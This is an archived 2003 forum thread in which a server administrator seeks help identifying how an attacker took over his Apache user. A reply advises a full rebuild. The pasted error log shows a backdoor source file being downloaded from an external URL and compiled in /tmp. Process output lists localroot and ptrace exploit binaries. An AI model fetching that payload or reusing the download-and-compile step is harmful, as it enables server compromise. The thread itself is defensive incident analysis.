Welcome to MobyThreads.com!
FAQFAQ      ProfileProfile    Private MessagesPrivate Messages   Log inLog in
All support for the MobyThreads Threaded phpBB MOD can now be found on welsolutions at this forum

Need help to identify (apache?) exploit...

 
   Web Hosting and Web Master Forums (Home) -> Apache RSS
Next:  Authentication not working.  
Author Message
jason11

External


Since: Jul 31, 2003
Posts: 1



(Msg. 1) Posted: Thu Jul 31, 2003 7:02 pm
Post subject: Need help to identify (apache?) exploit...
Archived from groups: alt>apache>configuration, others (more info?)

My Related URL References:
[http://www.webhostingtalk.com/showthread.php?s=&threadid=169024] and
[http://www.experts-exchange.com/Security/Linux_Security/Q_20691048.html]



I need help identifying an unknown exploit of some kind that allowed a
remote attacker to gain control of the apache user, and compile a back door
program in the /tmp directory (
http://www.myxpls.hpg.com.br/exploit/locais/bd.c) found in error_log here:



--error_log snippet--



sh: option `-c' requires an argument

--20:06:54-- http://www.myxpls.hpg.com.br/exploit/locais/bd.c

=> `bd.c'

Resolving www.myxpls.hpg.com.br... done.

Connecting to www.myxpls.hpg.com.br[200.226.137.9]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1,828 [text/plain]



0K . 100% 1.74
MB/s



20:06:54 (1.74 MB/s) - `bd.c' saved [1828/1828]



bd.c: In function `main':

bd.c:77: warning: comparison between pointer and integer



--error_log snippet--



When I stepped in the user was running the backdoor as the apache user in
memory disguised as httpd and further re-ran the backdoor program
(/tmp/localroot) and (/tmp/ptrace) shown from 'ps waux' below:



apache 32744 0.0 0.0 1364 272 ? S Jul25 0:00 ./ptrace

apache 32767 98.6 0.0 1348 288 ? R Jul25 378:36 ./localroot

apache 317 0.0 0.0 1348 296 ? S Jul25 0:00 httpd



I thought I was all about security until this happened. I was up2date,
firewalled, all services/ports not being used I've turned off, CGI suexec'd,
php_safe_mode=true, etc... before this happened.



I've looked for .bash_history files, scanned apache logs ( both SSL and
error_logs and client access_logs ), /var/log/messages, recently uploaded
client files, recently added files to the system, recently modified system
files, etc... for anomolies ( SEGFAULTs, SIGHUPs, PHP, forum board abuse ),
and compared md5sum of system binaries with uninfected systems all for
naught! The only pieces of information I have of how this exploit occurred
was in the apache error_log snippet above.



Does anyone have experience with this sort of thing?

 >> Stay informed about: Need help to identify (apache?) exploit... 
Back to top
Login to vote
abuse4

External


Since: Aug 01, 2003
Posts: 1



(Msg. 2) Posted: Fri Aug 01, 2003 2:06 pm
Post subject: Re: Need help to identify (apache?) exploit... [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)

"Jason Vance" <jason DeleteThis @vancetech.com> wrote in message
news:vij80qa91u2845@corp.supernews.com...

 > Does anyone have experience with this sort of thing?

Excellent post, what exactly do you want help with. I'll admit I've not checked
your related links, but if you define what exactly the problem is atmo others
may be able to help. What OS, Apache version would be a good start. Depending on
how important the box is, I'd be up all night rebuilding if it were me. Rebuild
= format.<!-- ~MESSAGE_AFTER~ -->

 >> Stay informed about: Need help to identify (apache?) exploit... 
Back to top
Login to vote
Display posts from previous:   
Related Topics:
Apache Listening on 443 only - Hi, I configured the httpd.conf file on a brand new install of RH 9 machine and found that Apache is listening on port 443 only, what could be the cause of this? I tried to change the Listen directive and that didn't seem help. Thanks, Yang

Apache proxypass on RH 9 - I've just installed RH 9 and have apache up and running I've been reading about how to setup proxy passes and think i have it all figured out but i do not know where you get the proxypass mod. webmin shows that it is not installed. any help would be..

Tomcat 4 and Apache - Hello all. I worked with Apache and Tomcat 3 for a while but never got around to Tomcat 4. My question is how do Apache and Tomcat 4 work together? Is Tomcat 4 a web and app server in one, or maybe Apache has to be configured to send requests to..

Adding SSL to Apache 2.0.44 - I've installed Apache as part of the IndigoPerl installation. What exactly do I need to do to add SSL to Apache? A link to a tutorial or FAQ or whatever will be much appreciated. Thanks! Jay

Apache as proxy for the web - Hi all, I need to config Apache so that every request that is coming is redirected to the www. I'd like in other words to use it as a proxy for Internet. Is it possible ? I've read about the proxy directive, but I cannot find a way to forward a route to....
   Web Hosting and Web Master Forums (Home) -> Apache All times are: Pacific Time (US & Canada) (change)
Page 1 of 1

 
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



[ Contact us | Terms of Service/Privacy Policy ]